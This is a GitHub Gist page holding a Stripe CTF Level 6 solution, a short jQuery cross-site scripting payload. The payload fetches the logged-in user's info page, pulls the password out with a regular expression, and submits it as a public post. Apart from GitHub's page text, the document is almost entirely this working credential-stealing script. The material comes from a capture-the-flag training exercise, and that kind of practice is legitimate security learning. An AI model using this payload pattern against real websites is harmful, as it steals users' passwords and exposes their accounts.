Created
August 23, 2012 01:25
-
-
Save Pewpewarrows/3431084 to your computer and use it in GitHub Desktop.
Stripe CTF Level 6 XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$.get('https://level06-2.stripe-ctf.com/user-madrtmdusg/user_info', function(data){ | |
var password = /Password:<\/th>\s+<td>(.+)<\/td>/.exec(data)[1]; | |
$('#content').val(password); | |
$('#new_post').submit(); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Here it is for local embedding: